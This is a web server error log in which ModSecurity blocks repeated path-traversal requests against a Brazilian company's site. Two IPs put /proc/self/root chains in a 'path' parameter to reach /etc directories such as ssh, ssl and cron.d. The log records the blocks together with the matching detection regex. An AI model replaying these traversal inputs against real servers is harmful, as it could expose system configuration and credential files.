[Mon Mar 16 08:14:34.992030 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:38208] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmGnbQATo66fKoS7wuLwAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:35.284950 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.241.46:52104] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmG_9ocpUE4ed4uDzSiQAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:36.315589 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:38216] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmHP9ocpUE4ed4uDzSigAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:36.867407 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.241.46:52120] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmHBXjF1vJNtV6CWrelQAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:14:37.593683 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.243.203:38220] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmHRXjF1vJNtV6CWrelgAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:38.782573 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:38228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmHo6lpbStxTqkSktRaQAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:39.980000 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.241.46:54772] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmH3jZBu2q05ozVU844AAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:41.584238 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.243.203:38240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmIQlT9VtDQc7bgUyLqwAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:42.887099 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.243.203:33838] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmIv9ocpUE4ed4uDzSjAAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:42.988842 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.241.46:54784] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmIhXjF1vJNtV6CWremgAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:45.235736 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:33842] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmJZqj1wV0Si-OkefNEQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:46.531713 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.243.203:33858] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmJpqj1wV0Si-OkefNEwAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:46.952044 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.241.46:54786] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmJv9ocpUE4ed4uDzSjwAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:48.371376 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:59530] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmKLABkC4fWIHEf8HPbwAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:48.847546 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.243.203:33868] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmKAlT9VtDQc7bgUyLrQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:49.689153 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.241.46:59534] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmKXjZBu2q05ozVU845wAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:50.206332 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.243.203:39044] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmKnjZBu2q05ozVU846QAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:52.037899 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:59548] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmLNSswJuvopo3lOhEygAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:14:52.541579 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:39060] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmLHbQATo66fKoS7wuNAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:53.794702 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:39064] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmLbABkC4fWIHEf8HPcQAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:54.973263 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:39072] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmLrysWC90G-1nBrAp_QAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:56.108799 2026] [:error] [pid 32654:tid 140411641214720] [client 74.7.243.203:39082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmMAlT9VtDQc7bgUyLrgAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:14:58.383491 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.243.203:39084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmMnbQATo66fKoS7wuOAAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
